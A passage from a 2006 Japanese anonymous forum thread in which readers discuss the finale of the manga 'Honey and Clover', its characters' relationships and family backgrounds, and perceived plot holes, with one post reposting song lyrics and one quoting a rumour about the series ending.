     短所:打算的、自分の行動によって相手を傷付けることも厭わない、ストーカー(結局これかよ)

森田  長所:空気読みに関しては全キャラ中トップレベル、意外と面倒見が良い
     短所:破天荒すぎて結局は周囲を一番振り回している

265 :花と名無しさん:2006/08/06(日) 22:00:25 ID:???O
森田 嫌なことから逃げてる印象がある

266 :花と名無しさん:2006/08/06(日) 22:01:17 ID:???0
カズさんも大人

267 :花と名無しさん:2006/08/06(日) 22:09:28 ID:???0
誰だっけそれ

268 :花と名無しさん:2006/08/06(日) 22:10:52 ID:???0
竹本の義理父

269 :花と名無しさん:2006/08/06(日) 22:11:40 ID:???0
花本家はロクなやつがいないな

270 :花と名無しさん:2006/08/06(日) 22:18:21 ID:???O
しんさんも大人

271 :花と名無しさん:2006/08/06(日) 22:23:49 ID:???0
そう言えば竹本は母親がカズさんと再婚したことで、竹本姓じゃなくなっているような
それともまだ内縁関係で竹本姓のままなのか?夫婦別姓にしたのか?

わけわからん。

272 :271:2006/08/06(日) 22:28:05 ID:???0
っと思ったら初登場時には既に母親は再婚してたのか、スマン

273 :花と名無しさん:2006/08/06(日) 22:39:16 ID:???0
カズさんは竹本って感じがしない。たけのこ実父のが似合う。

274 :花と名無しさん:2006/08/06(日) 22:46:35 ID:???0
母親が再婚して姓が変わっても
息子がその相手の籍に入る必要はないよね?

275 :花と名無しさん:2006/08/06(日) 22:48:01 ID:???O
加藤も深野にならなかったし

276 :花と名無しさん:2006/08/06(日) 22:50:22 ID:???0
子供は子供で養子縁組しないと親子にはならないんだっけ?

277 :花と名無しさん:2006/08/06(日) 23:01:28 ID:???0
棟梁も大人

278 :花と名無しさん:2006/08/06(日) 23:02:41 ID:???O
徳大寺先生も大人

279 :花と名無しさん:2006/08/06(日) 23:07:17 ID:???0
たけのこの場合、たけのこの戸籍はそのまま竹本に残り、
母親だけ竹本の戸籍を抜けてカズさんのところにうつる。
だから、たけのことカズさんの間には「自分を産んだ母親の再婚相手」
というだけで法的な家族関係性はなし。
親子関係になるには養子縁組をするしかない。
ちなみに「入籍」というのがあって、親子にはならないけど籍はカズさん傘下に入る・・・
っていうのもあり。この場合は苗字は同じになるけど親子関係はない。

・・・と、いう感じだったと思うけど・・・

ちなみに全然関係ないけど、いくらきれいに洗ってあるとは言え、
野っ原に生えてた草を食うのはいやだなー。
なんでわざわざサンドイッチの具にする必要があったんだろ。タイトルのこじつけ?

280 :花と名無しさん:2006/08/06(日) 23:11:56 ID:???0
はぐも空気読むよね。
作品を通じてのことが多いけど。

281 :花と名無しさん:2006/08/06(日) 23:14:27 ID:???0
「ミュ〜ル、ミュ〜ル、わーいわーい」の辺りでは
空気を読めないとかそういうチャチなものでなく、もっと恐ろしいものの片鱗を見た気になるが

282 :花と名無しさん:2006/08/06(日) 23:16:19 ID:???0
読者の空気は読めてないけどね

283 :花と名無しさん:2006/08/06(日) 23:16:37 ID:???0
はぐには基本的な挨拶から仕込みたいと感じる
おばあちゃんそういう躾しなかったのか

284 :花と名無しさん:2006/08/06(日) 23:22:06 ID:???0
抱擁シーンでの森田とはぐの空気の読み合いはもうニュータイプの域だった

285 :花と名無しさん:2006/08/06(日) 23:23:53 ID:???0
竹本は初期のほうが森田が寂しがりやだとか言って大人だった気がする。

286 :花と名無しさん:2006/08/06(日) 23:24:16 ID:???0
おばあちゃんといえば…
一度位おばあちゃんを世話してた時の
まともな純和風料理を披露して欲しかった
意外とプロ級だったりしてw

それとも…ばあちゃんもあの味覚とか?

287 :花と名無しさん:2006/08/06(日) 23:24:54 ID:???0
竹本母とカズさんも確かかなりの年の差カップルだよな

288 :花と名無しさん:2006/08/06(日) 23:25:06 ID:???O
ばあちゃんの設定はあくまではぐを可哀想に見せる為の演出

はぐの幼児キャラも作者のおふざけ的なつもりもあったのだろうが、
過剰な自己投影やキャラの掘り下げ過ぎで恐ろしい子!に……

289 :花と名無しさん:2006/08/06(日) 23:26:32 ID:???0
芸術家はぐの内!面!怖すぎる。恐ろしい。

290 :花と名無しさん:2006/08/06(日) 23:51:52 ID:???0
はぐはブチ切れたら誰よりも強そう

291 :花と名無しさん:2006/08/06(日) 23:53:53 ID:???O
森田さんの あの格好良さに惚れた>.......私も一緒に芸術を....
つか嫁にしてええ

292 :花と名無しさん:2006/08/06(日) 23:56:59 ID:c+nBF93yO
一平さんも大人

293 :花と名無しさん:2006/08/06(日) 23:57:40 ID:???O
>>291


294 :花と名無しさん:2006/08/07(月) 00:16:51 ID:???0
なにげにたけのこはスポーツ系流行りの服を着ているな。
運動神経がいいっていう設定あったよね?
でも窓は越えられないとか、作者に設定忘れられてないか


295 :花と名無しさん:2006/08/07(月) 00:23:02 ID:???O
>>294
格闘技ファンという設定もアリ

296 :花と名無しさん:2006/08/07(月) 00:26:43 ID:???0
必殺設定返し裏手投げは作者の得意技だからねぇ
鉄人からカマトト女になった山田といい
合コンお持ち帰り男から純情DT野郎(には見えないけど)になった真山といい

297 :花と名無しさん:2006/08/07(月) 01:14:38 ID:???0
忘れられた細かい設定書き足し乞う。

竹本 温泉好き・格闘技ファン・スポーツ万能
森田 コーヒー牛乳好き
真山 ザル お持ち帰り男
はぐ 金の亡者 肉喰い
山田 鉄人

298 :花と名無しさん:2006/08/07(月) 01:31:53 ID:???O
>>291
いくらなんでも腐女子キモ

299 :sage:2006/08/07(月) 01:31:57 ID:9NHz+Q1M0
<<297
たけのこは入学当初、森田に髪を無理やり短髪にさせられる前までは
今時の大学生っぽい髪型だった。
(森田が千円いただきまーすとか言ってたコマ・1巻)
が、アパートのみんなに初めて歓迎されたシーン(何巻か忘れたが、↑の後に
書かれたシーン)ではすでにやや短髪気味だった記憶が。

300 :花と名無しさん:2006/08/07(月) 01:33:46 ID:???O
その場その場の思い付きで描く人なんですね。

301 :花と名無しさん:2006/08/07(月) 01:53:56 ID:???0
私が産まれた朝の街 雪の中に埋もれた
それはそれは小さい手で青空を仰いだ
さながら昔からよく知ってる 隣のあの子のように
片方の耳たぶで聴く卒業のカノン
一人でも大丈夫よって めくれてる私のスト−リ−
誰かのせいにしたいよ つらいなぁいやぁ−いやぁ−
右利きのおりこうさんには 雨上がりをあげよう
手作りのフォーチュンクッキー食べながら出掛けよう
哀しくて泣いてばかりいたら めが溶けてなくなった
秋になり また 冬になり1つ歳をとった
遠くまで逃げているつもりで終わらない君のスト−リ―
にやにや笑ってる ふがいないやぁ−いやぁ−
縋りながら追いかけてみても 足蹴にされても
空いた穴を埋めよう 違いないやぁいやぁ ふがいないやぁ−−   
つらいなぁいやぁあ−−あ−−
重ねあう もたれあう 捨ててしまうんだ もうすぐ
消えてしまう 愛しい人も 優しいキミよもうすぐ
私が産まれた朝の街 雪の中に埋もれた
それはそれは小さい手で青空を仰いだ
遠くまで逃げているつもりで終わらない君のスト−リ―
にやにや笑ってる ふがいないやぁ−いや−
掴みながら追いかけてみても 足蹴にされても
空いた穴をふさごう 違いないやぁいやぁ ふがいないやぁ−−   
つらいなぁいやぁあ−−あ−−

302 :花と名無しさん:2006/08/07(月) 01:55:19 ID:???0
つーかヤフーとかで普通に感動したとか言ってる人が多いんだが
世間一般的には感動的な最終回なの?

自分は本屋で魂抜かれたけど

303 :花と名無しさん:2006/08/07(月) 02:00:27 ID:???0
映画版がスピッツなら、今夏から再開したアニメ版「ハチクロ」の
オープニングを手掛けるのはやはりこの人!!
前作「ドラマチック」が"キラめくようにアッパーな青春の日々…"を歌ったのに対し、
今作は登場人物達がよりシビアな現実に向き合って行くという
「ハチクロ」のスクリプトによりリンクし、大人になる程増して行く日々の中に燻る想い、
不甲斐なさを切なくも爽快に歌っている。
「遠くまで 逃げているつもりでも 終わらない 君のストーリー/にやにや 笑っている ふがいないや いや。」
と強いフックも登場する詞世界も「ドラマチック」より、グッとヘヴィーになっているのだが、
それを受け容れられたら明日への活力になる。
そんな聴くほどに胸に響くメッセージを込めた名曲の誕生だ。

304 :花と名無しさん:2006/08/07(月) 02:30:34 ID:???0
そういやはぐってたけのこに「竹本君」って呼びかけるように、
森田さんのことを名前で呼んだことってあったっけ?
仮にも意識してた相手なんだから、一度ぐらい名前で呼ぶシーン
あってもよかったろうになーとふと思った。
(コミックス派なんで、その先にそういうシーンがあったんならスマソ)

305 :花と名無しさん:2006/08/07(月) 02:41:38 ID:???O
森田もマウスとしか言わないよね

306 :花と名無しさん:2006/08/07(月) 02:51:53 ID:4EKBh8rjO
真山の事は何て呼んでた…?

307 :花と名無しさん:2006/08/07(月) 06:31:37 ID:???O
描写が無いから想像するしかない

308 :花と名無しさん:2006/08/07(月) 09:46:02 ID:???0
メガネじゃね。

309 :花と名無しさん:2006/08/07(月) 10:53:58 ID:???0
はぐと真山って、ほとんど会話がない気がする。

310 :花と名無しさん:2006/08/07(月) 12:08:27 ID:???0
ウミノさんにとって道端のクローバーを料理に使うのは
道端のヨモギを摘んできて草餅を作る感覚と一緒なんじゃないだろうか

しかし何でサンドイッチなんだろう、メシマズ設定の回収なんだろうか
ハチミツ色の素材(よくわかんないけどプラスチックとか硝子とか)で
クローバーを中に入れた小物とか作って、
日に透かしたらハチミツ色の中にクローバーが透けて見えて
あの日の僕たちの残像がそこに見えた…とかで済ませればよかったのに

311 :花と名無しさん:2006/08/07(月) 12:11:41 ID:???0
>>310
それ綺麗だねえ。

312 :花と名無しさん:2006/08/07(月) 12:11:41 ID:???0
>>310
なんかそれもチープだなw
サンドイッチの良いところは何枚もってとこじゃね?
あんなに必死に探してもなかったモノがってのがいいんじゃない。


313 :花と名無しさん:2006/08/07(月) 12:13:33 ID:???0
前回の失敗を受けてクローバー育ててたんだよ。

314 :花と名無しさん:2006/08/07(月) 12:34:36 ID:???O
買って育てたとかか。
病室でw

315 :花と名無しさん:2006/08/07(月) 12:40:26 ID:???0
はぐは、
山田とふきだし共有だからすごく曖昧だが、
一回だけ「森田さん」って言ってた。
さん付けなのか・・と思った記憶がある。

316 :花と名無しさん:2006/08/07(月) 12:46:23 ID:???0
かなり年上だし、「さん」付けが一番自然では?

317 :花と名無しさん:2006/08/07(月) 13:04:03 ID:???0
1回くらいはぐも森田もお互いちゃんと呼び合うとこ見たかった。
9巻最後でそんな期待いだいたが、どうやら最後までないようだね。

318 :花と名無しさん:2006/08/07(月) 13:18:59 ID:???0
森田はやっぱりよぶとしたら「はぐ」と呼ぶのかな。
「花本」じゃ修と一緒だし、「はぐちゃん」とか絶対呼ばないだろうし
山田のこともたまに「あゆ」って呼んでたし・・・
でも想像つかない。
おまえかあいつかマウス・・・これじゃあ恋が成就しようもねーよ!

319 :花と名無しさん:2006/08/07(月) 13:31:33 ID:???0
「はぐみ」と「しのぶ」

320 :花と名無しさん:2006/08/07(月) 13:34:42 ID:???0
それは・・・なんかむり!

下の名前で呼び合うと普通の大学生のさわやカップルみたいだね。

321 :花と名無しさん:2006/08/07(月) 13:53:43 ID:???0
上だったら森田さん、下だったらしのぶくん、かな。
竹本は竹本くんだけど、森田くんはなさそう。

322 :花と名無しさん:2006/08/07(月) 13:57:12 ID:???0
はぐって真山のことも読んだことないな。しゃべったこともほとんど無いが。

323 :花と名無しさん:2006/08/07(月) 13:59:21 ID:???O
>>312
じゃお前食えよ<雑草サンド

324 :花と名無しさん:2006/08/07(月) 14:16:58 ID:???0
何年も5人で行動してたとは思えない関係の薄さだよな

325 :花と名無しさん:2006/08/07(月) 14:27:19 ID:???0
真山とはぐの交流ってもうちょっと書くべきだったよな。
何巻かで、
「最初は竹本くんとか先生としかしゃべらなかったのにー」って
山田が言ってたし、
ちょっとずつ真山あたりとも仲良くなる様子が欲しかった。

326 :花と名無しさん:2006/08/07(月) 14:32:52 ID:aLLn2W7y0
竹本 スピッツのマサムネ
真山 スガシカオ
森田 真心の倉持

さすが同人出身者www

327 :花と名無しさん:2006/08/07(月) 14:59:05 ID:???0
>>9のとこのバレ見てふと夏目漱石の『こころ』が思い浮かびますた。

328 :花と名無しさん:2006/08/07(月) 15:00:52 ID:???0
やめてくれー
倉持さん大好きなんだ
どうして元ネタ出したがるんだ作者
会えるかもしれないからか?
本気でむかつく

329 :花と名無しさん:2006/08/07(月) 15:02:09 ID:???0
結局カバミが一番の勝ち組か

330 :花と名無しさん:2006/08/07(月) 15:12:36 ID:???O
元ネタ出すのは、会えるかもしれないから、というより
誰かがセッティングするようにし向けてる・アピってるに一票。

倉本もそうだがデスノの作者にも会いたがってるよな。

331 :花と名無しさん:2006/08/07(月) 15:14:50 ID:???0
この流れ…
既視感を感じる

332 :花と名無しさん:2006/08/07(月) 15:19:16 ID:???O
>>326
草野さんってたけのこのモデルなの?
初めて知った…。

333 :花と名無しさん:2006/08/07(月) 15:40:08 ID:???0
マサムネは違うと思うが・・・

334 :花と名無しさん:2006/08/07(月) 15:42:14 ID:???O
>>330
ガモウくらい会いにいけばいいのに。

335 :花と名無しさん:2006/08/07(月) 16:03:04 ID:???O
山田は真山のどこが好きだったかんだろうか?

336 :花と名無しさん:2006/08/07(月) 16:08:29 ID:???0
>>335
一目ぼれじゃないのかな
人にはそれぞれ好みがあるしね。。。

337 :花と名無しさん:2006/08/07(月) 16:27:45 ID:???0
真山ってリカのこと好きになってからケガのこと知ったのかと思っていた。
ムーンリバー歌ってるの聴いて好きになって、
その後あの風呂で倒れたとこで初めてケガを知ったのかと。
でも、今読み返してみたら、6巻で初対面の時点でリカ腕の傷丸出しだったんだね。
なんかなぁ、あの初対面のとこのエピソード無い方が良かった・・・

338 :花と名無しさん:2006/08/07(月) 16:38:35 ID:???0
純愛漫画ぶってるのに誰一人純愛してないんだね

山崎は違うけど

339 :花と名無しさん:2006/08/07(月) 16:40:45 ID:???0
純愛って本来ドロドロしたもんだから間違ってないんじゃね?
取って食ってサヨナラする方がサッパリ清潔感あるよ。

340 :花と名無しさん:2006/08/07(月) 16:42:21 ID:???0
>>335
温室そだちだから、
合コンでお持ち帰りを繰り返しちゃうような雰囲気に惹かれた
しかもそうやって悪ぶって大人ぶってるわりに子供っぽいところがあるのに母性本能くすぐられた
かと思ってたけど、
合コンお持ち帰りは無かったことになっちゃったんだよね。

あの追加エピソード不自然すぎないか?
「真山って奴いる?」っていう問い合わせを、
真山が女の子お持ち帰りしたんだと勘違いするってありえないと思うんだけど。

341 :花と名無しさん:2006/08/07(月) 16:44:00 ID:???0
竹本と山田は無駄に仲良くなりすぎだった気が
幼児好きとメガネ好きだからよかったのかな

342 :花と名無しさん:2006/08/07(月) 16:46:20 ID:???0
仲良くなってたか?
はぐを通してってかはぐ関連の話しかしてないよ?

343 :花と名無しさん:2006/08/07(月) 16:48:05 ID:???0
山田の兄ちゃんとネットマニアの人のキャラがかぶってる件

344 :花と名無しさん:2006/08/07(月) 16:50:52 ID:???0
小鳥のブローチ、色ぐらい塗れよって思った

345 :花と名無しさん:2006/08/07(月) 16:52:39 ID:???0
木の色のままのほうがいいよ

346 :花と名無しさん:2006/08/07(月) 16:59:40 ID:???O
うん。木のままのがいい。

347 :花と名無しさん:2006/08/07(月) 17:06:59 ID:???0
>>344
白木のままで木の肌を生かしてるんだよ。

348 :花と名無しさん:2006/08/07(月) 17:28:26 ID:???O
森田が木肌にこだわってチップ選んでたね。
ああいうとこはリアルなんだよね

349 :花と名無しさん:2006/08/07(月) 17:38:29 ID:???0
>>344
木目の美しさって理解できる?

350 :花と名無しさん:2006/08/07(月) 18:14:02 ID:???0
>>344の人気っぷりに嫉妬

351 :花と名無しさん:2006/08/07(月) 20:07:15 ID:???O
>>340
アテクシの魔山は悪ぶってはいるけど本当は
心も体も純粋なの☆彡
といううみのタソのメッセージさ

352 :花と名無しさん:2006/08/07(月) 20:39:14 ID:???0
なんだかんだ言って不自然な部分はみんな読者のせいにしそう

353 :花と名無しさん:2006/08/07(月) 20:45:59 ID:???O
読者の皆さんに文句言われたからです><

354 :花と名無しさん:2006/08/07(月) 20:51:35 ID:???0
>>341
そんなに仲いい感じはしなかったけど
山田がはぐの怪我の程度聞いて泣いてるとき肩もってたりとか
竹本が花が高くて買えないって眺めてるの見て微笑んで
花が咲いてる線路沿いに連れてったシーンはよかった。

355 :花と名無しさん:2006/08/07(月) 22:17:13 ID:???0
真山とリカ嫌いですよ

356 :花と名無しさん:2006/08/07(月) 22:28:24 ID:???0
森田父って、なんで亡くなったの?

357 :花と名無しさん:2006/08/07(月) 22:49:32 ID:???0
あっそれ自分も知りたいヽ(゜д゜ヽ)

358 :花と名無しさん:2006/08/07(月) 22:55:23 ID:???0
それは膿野に聞くしかない

359 :花と名無しさん:2006/08/07(月) 23:08:36 ID:???0
親が死んでたほうが絵になるからじゃね?

360 :花と名無しさん:2006/08/07(月) 23:10:13 ID:???0
氏ぬ話好きだねこの作者

361 :花と名無しさん:2006/08/07(月) 23:12:11 ID:???0
森田父は実は自殺。重すぎて描けなかった!!

362 :花と名無しさん:2006/08/07(月) 23:13:56 ID:???0
カオルが「死んだほうがマシだっていうくらい追い詰めてやる」
と言ってるからには
森田家は死んだ方がマシなくらいな目にあったのではと。

363 :花と名無しさん:2006/08/07(月) 23:17:06 ID:???0
((((((;゚Д゚))))))ガクガクブルブル

364 :花と名無しさん:2006/08/07(月) 23:17:18 ID:???0
やっぱり信じられないほど貧乏になったのかなあ
風呂にも入れないぐらいの

365 :花と名無しさん:2006/08/07(月) 23:21:54 ID:???0
特許も実績も全部取り上げられて、さらに傘下に入らなかった戒めに
業界的に潰しがかかる。どことの取引もうまくいかなくなる。
大人の世界はキビシイものです…

366 :花と名無しさん:2006/08/07(月) 23:26:19 ID:???0
貧乏で風呂に入らなくてもホームレスは生きとるがな
技術者がそう簡単に飢え死にするかな?

367 :花と名無しさん:2006/08/07(月) 23:27:23 ID:???0
あのおおらかな父ちゃんが追い詰められていくのをみるだけでも
死んだ方がマシな気になりそうだね。ファザコン兄弟は。

368 :花と名無しさん:2006/08/07(月) 23:28:15 ID:???0
それよりりっちゃんはどうなったのさ

369 :花と名無しさん:2006/08/07(月) 23:28:31 ID:???0
飢え死にはないでしょw
過労死とか?自殺ではない感じだったよね。

370 :花と名無しさん:2006/08/07(月) 23:30:38 ID:???0
森田弟の野良猫体質はそういうヒサンな幼少期に形成されたんだろうな

371 :花と名無しさん:2006/08/07(月) 23:41:06 ID:???0
笑えないんだよ。
持てるものと持たざるものの苦悩の対比なのか知らんけど
竹本の悩みはみんなで微笑ましく見てられたけど
天上界目線まで上がっての持てるものの苦悩とか全然笑えません。
はぐのとダブルで来たしな。

372 :花と名無しさん:2006/08/07(月) 23:51:10 ID:???0
親子関係がなんかワンパターン。
竹本も父親亡くしてるし、はぐも母親が早くに亡くなってて
父親とも仕事の都合っぽいことで疎遠。
森田も母親にはあまり触れられてないし、父親亡くなってる。
リカも実家で親と確執ありそうだったし。

373 :花と名無しさん:2006/08/08(火) 00:09:32 ID:???0
ふがいないやーいやーいやー

374 :花と名無しさん:2006/08/08(火) 00:21:19 ID:???O
打ち切りかと思うような内容だった。ほんとにあれで最終回なの?
忍もあっさり帰ってくるし、はぐと修とかきもいことになってるし、
その他もろもろ…えーと結局なんだっけコレ…みたいな感想しか出ない。
もったいないな、こんな終り方。

375 :花と名無しさん:2006/08/08(火) 00:28:49 ID:???P
登場人物に親がいない設定といえば、アリナチを思い出すんだが

376 :花と名無しさん:2006/08/08(火) 00:31:36 ID:???O
>375
やーめーれ。

377 :花と名無しさん:2006/08/08(火) 02:46:11 ID:???0
いつの間にか修とはぐがくっついてたって
はぐ溺愛してるはぐの野父親である修のいとこも複雑だよな。

連載初期は絶対はぐと花本先生くっつける雰囲気なかったのに
8巻くらいから竹本森田はぐの三角関係に急にふってわいて掻っ攫っていくとか不思議すぎる。

378 :花と名無しさん:2006/08/08(火) 03:25:39 ID:???0
本当に返す返すも伏線張ってくれたら良かったのに
8巻頃から修はぐ思いついたならそこからでも丁寧に描けばいいのに
内容はケガでご都合主義全開なんだもんな
そりゃスレも荒れるさ

379 :花と名無しさん:2006/08/08(火) 07:34:00 ID:???0
うーん・・・落としどころが・・・掲載誌変わったあたりからね・・・
残念。

380 :花と名無しさん:2006/08/08(火) 08:51:13 ID:uADVKYzK0
ていうか森田は金集めてたのによく美大入ったよな・・・金の無駄じゃなかったのか?

381 :花と名無しさん:2006/08/08(火) 09:29:59 ID:???0
>>380
美術で金を稼ぐためさ。
現に大金を手にしたじゃないか。

382 :花と名無しさん:2006/08/08(火) 09:39:17 ID:???O
変態の友達は端金出して集積所行かないと見つからない
社会じゃ相手にされないから
精神安定剤のキャバクラがわりか?
変態の生きにくさを明るく描いたね!
救われた人も多いだろうがコーラスでは無理がでたね。

383 :花と名無しさん:2006/08/08(火) 09:43:52 ID:???0
はぐの「人生をください」発言後に修が「全部やる」と言ってラブラブモード
とネタバレに書いてあるんだけどどんな描写だったの?
抱き合ってたとか?それとも雰囲気?
誰かが画像アップしてたけどすでに見れなくなってるし


384 :花と名無しさん:2006/08/08(火) 10:08:54 ID:???0
>>383
はぐはベッドに寝て「人生ください」発言をし、
修ははぐの手を握りながら、「全部やるよ」と言う。
二人とも頬を赤らめて見つめ合う。

385 :花と名無しさん:2006/08/08(火) 10:30:12 ID:???0
>>381
でも全然授業出てなかったし
行ってても行ってなくても森田は美術の才能あった気がする

386 :花と名無しさん:2006/08/08(火) 10:46:45 ID:???0
普通に考えれば大学行くのは人脈作るためにいいんじゃないかな。
才能だけで稼げるものでもないし。

387 :花と名無しさん:2006/08/08(火) 11:01:22 ID:???0
>>384
ありがとう。
10巻発売が来月でよかった。


388 :花と名無しさん:2006/08/08(火) 11:06:31 ID:???0
>>385
だって学校楽しいじゃん。


389 :花と名無しさん:2006/08/08(火) 11:13:11 ID:???O
>>388
お前の感想はイラネ

390 :花と名無しさん:2006/08/08(火) 11:28:09 ID:VW30BdjV0
461 :名無しさん@恐縮です :2006/08/08(火) 00:05:27 ID:3DnBOHh50
てか「ハチミツとクローバー」が突然終わったのも
こいつのせいだろ?
掲載誌が一条のホームのコーラスに移ってから
目障りだって潰させたって聞いたけど。

391 :花と名無しさん:2006/08/08(火) 11:41:10 ID:???0
美佳子ちゃんのネットのラジオに
ふたたび参加してきました☆

今回も神谷さんと杉田くん(愉快な仲間たち)と一緒です!

…そして楽しい事に
途中から野宮さん役の浜田賢二さんがぶらりと遊びにきてくださり
5人でまったりおしゃべりしてまいりました

美佳子ちゃんのラジオもう266回なのですね!!
すごいなぁ。

ウミノと愉快な仲間たちが出るのは8月10日更新分です
今週の木曜日ですね

アドレスは
http://shop.frontierworks.jp/digital/web_radio/detail_037.asp
であります!

プレゼントとかもあるので是非きいてくみてくださると嬉しいです


392 :花と名無しさん:2006/08/08(火) 13:06:21 ID:???0
やっと本当にコーラス読んだよ。
いい最終回じゃない。つまんないけど。

393 :花と名無しさん:2006/08/08(火) 13:22:04 ID:???0
日本画の中森名誉教授はどうなったんだろう…
森田卒業してないよね?

394 :花と名無しさん:2006/08/08(火) 13:34:56 ID:???O
学費勿体ねー

395 :花と名無しさん:2006/08/08(火) 15:14:51 ID:???0
スーパーフリーを思い出した
大人になれない大人の典型

396 :花と名無しさん:2006/08/08(火) 15:21:26 ID:ObPSqsnM0
http://2nd.intro.sub.jp/?eid=516907
ここのハチクロの感想、やべー。
言ってることはどうでもいいけど文章がヘタすぎて逆に面白い。

397 :花と名無しさん:2006/08/08(火) 17:44:21 ID:???0
手入れしてないロンゲなのにもてるってところが倉持と一緒www

398 :花と名無しさん:2006/08/08(火) 17:53:55 ID:???0
>>396
本人宣伝乙。
絶対に見てやらない。

399 :花と名無しさん:2006/08/08(火) 18:20:46 ID:???0
>>396
まともなレビューブログだったから私怨だと思う。
9巻を褒めてたけど、10巻読んだらどんな感想抱くんだろう・・・とちょっと心配になった。

400 :花と名無しさん:2006/08/08(火) 20:31:06 ID:???0
今、映画化のせいか、
コンビニとかで単行本の初めの方のやつ置いてるんで、
ちょっと読んでみたが、
やっぱりなんかテイスト違ってきちゃったんだなって感じだ…
初期のあれはあれで、色々とばし過ぎな気もするけどな

401 :花と名無しさん:2006/08/08(火) 21:22:21 ID:???0
>>396
別に普通じゃん
何もおかしくも変でもないけど

402 :花と名無しさん:2006/08/08(火) 21:36:50 ID:???0
スルー検定実施中

403 :花と名無しさん:2006/08/08(火) 22:41:11 ID:???O
9巻では7話はいってたけど、
10巻に7話くらいはいるほど進んだっけ?
番外編とかがはいる?

404 :花と名無しさん:2006/08/08(火) 22:48:06 ID:???0
>>403
はぐっぽい話し方やめてください。

405 :花と名無しさん:2006/08/08(火) 22:58:31 ID:???0
単行本組なんだけど、はぐと修は結局くっついてしまったのですかそうですか…。orz

406 :花と名無しさん:2006/08/08(火) 23:04:37 ID:???0
>>403
61〜64話だけじゃ薄過ぎるから何か入ると思うよ

407 :花と名無しさん:2006/08/08(火) 23:18:48 ID:???0
はぐが怪我したところから最終回の前の回まで
ごっそり何か別の話と入れ替えても
全然違和感なく収まりそうなくらい直前との繋がりが薄い最終回だった
というかはぐの怪我が必然となるエピソードって
修との関係が進展したことくらいしかない気が('A`)
はぐの怪我って必要だったのか?

408 :花と名無しさん:2006/08/08(火) 23:26:40 ID:???O
>>407
はぐがみんなに同情してもらえるようにするためですよ☆彡

409 :花と名無しさん:2006/08/08(火) 23:27:13 ID:???0
むしろ、はぐの怪我なしで
はぐ修確定する方が
まだマシなような……


410 :花と名無しさん:2006/08/08(火) 23:32:06 ID:???O
はぐが渦の中心となってみんなを振り回す為の怪我なんですよ。

411 :花と名無しさん:2006/08/08(火) 23:40:41 ID:???O
>>404
どこらへんがです?

>>406
ありがとう!

412 :   :2006/08/08(火) 23:46:11 ID:wNP7/7OI0
結局、森田さんとはぐはくっつかなかったの?



413 :花と名無しさん:2006/08/08(火) 23:49:35 ID:???0
>>412
くっつかなかった。
最後に直接会ったのは森田が隠れ家に拉致した時かな。
その後最終回まで顔を合わせず。

414 :   :2006/08/08(火) 23:55:41 ID:wNP7/7OI0
ええーーー。そうなんだ。ありがとう。

修とはぐって。。。作者の思いつきだと私は思う。
森田×はぐ派だからがっかり。

415 :花と名無しさん:2006/08/09(水) 00:09:13 ID:???O
>>411
そういう所だよ
>>414
カプ厨ウザ
ちなみに修はぐは作者の役者萌えのせい

416 :花と名無しさん:2006/08/09(水) 00:20:54 ID:???O
>>415
だから、どういうとこがです?

417 :花と名無しさん:2006/08/09(水) 00:47:01 ID:???0
はぐと森田さんの場所に距離はないんだそうだ。
二人が一緒になったら二人で孤独になるしかない。
凡人とつなっがてるのが大好きなお人好しの天才達なのだと思った。

418 :花と名無しさん:2006/08/09(水) 00:49:45 ID:???0
ハタから見て、拉致って一泊朝帰りしたら
そりゃ修も殴るしたけのこも罵倒したくなるわ

419 :花と名無しさん:2006/08/09(水) 00:54:11 ID:???O
>>416
かまっちゃダメ。

残りのページは貝拾いの書き下ろしがドカドカ入って終りかも。

やっぱ最後の方はリライトしてほしい。

420 :花と名無しさん:2006/08/09(水) 00:56:38 ID:???0
先月号と最終回までの間を埋めて欲しいなあ。

421 :花と名無しさん:2006/08/09(水) 01:07:44 ID:???0
ウミノが堺雅人に出会わなかったら、
違う終わり方を迎えたのだろうかと小一時間(ry

422 :花と名無しさん:2006/08/09(水) 01:08:07 ID:???0
はぐは最初の頃の森田との買い物帰りでやっぱり修ちゃんじゃないと
ダメとか言ってたけど、結局そこに戻ったって事だったんだろうか。

はぐの修への思いは恋愛うんぬんより家族愛みたいなもんで
あぁ、はぐは父親の愛に飢えてたのかーとか思ったけど
父親って溺愛してたんだっけ?w

423 :花と名無しさん:2006/08/09(水) 01:14:07 ID:???0
>>416
平仮名ばっかで読みにくいトコじゃないかと・・・

チラ裏スマソ

424 :花と名無しさん:2006/08/09(水) 01:17:31 ID:???0
オフィシャルファンブックの
「ウミ子の部屋 第一回ゲスト花本はぐみさんを迎えて…」
のコーナーでのはぐの話し方が違うのが気になる。

「はい…でも夢中になるとよく忘れてまた肉ばかり食べてしまうんですけど…」
「大根おろしとかモヤシがたくさんのってるのが大好きです」とか…
なんかデスマス調のイメージじゃない。
最終回近くのはぐならまだわかるけど発行されたのが一年以上も前だし


425 :花と名無しさん:2006/08/09(水) 03:10:59 ID:???O
>>45
亀だが

・彼氏彼女の事情

426 :花と名無しさん:2006/08/09(水) 03:14:00 ID:???O
↑あ、すまん忘れてくれ

↓何事もなかったかのようにどうぞ

427 :花と名無しさん:2006/08/09(水) 04:34:42 ID:???O
(・∀・)ニラニラ

428 :花と名無しさん:2006/08/09(水) 07:29:18 ID:???0
>>425
や、わかるけどな、それ

429 :花と名無しさん:2006/08/09(水) 08:23:44 ID:???0
ちょっと前のジャンプ漫画の
なんでもかんでもトーナメント戦に雪崩込むやつは豹変漫画とちがうの?

430 :花と名無しさん:2006/08/09(水) 08:27:11 ID:???0
>>429
いまのジャンプにだってリボーンという豹変漫画があるじゃないか

431 :花と名無しさん:2006/08/09(水) 09:20:56 ID:???0
あれ昔ギャグだったよね
商業目的っぽくて嫌な豹変ぶりだ

432 :花と名無しさん:2006/08/09(水) 09:53:19 ID:???0
ジャンプは読んでないからわからんが、リボーンって言うのは、
東京ミュウミュウじゃないのか?


433 :花と名無しさん:2006/08/09(水) 10:56:20 ID:???0
>>422
そうだね。
はぐは、修ちゃんを家族愛だという対象だよね。
全く恋愛ではないと思うなー。
恋愛なら森田のほうだし。

434 :花と名無しさん:2006/08/09(水) 11:07:53 ID:???0
終わってたの知らんかったー。コーラスって買いにくいんだもん。
芸スポで>>390の書き込み見て飛んできたよ。打ち切り? もったいな。

435 :花と名無しさん:2006/08/09(水) 12:46:38 ID:???O
お前2ちゃん向いてない

436 :花と名無しさん:2006/08/09(水) 12:47:53 ID:???O
このスレで狂信者が適当に言ってたネタが伝わっちゃうんだな
ネットってこわい

437 :花と名無しさん:2006/08/09(水) 13:00:08 ID:???0
THE イナズマ戦隊 というバンドが
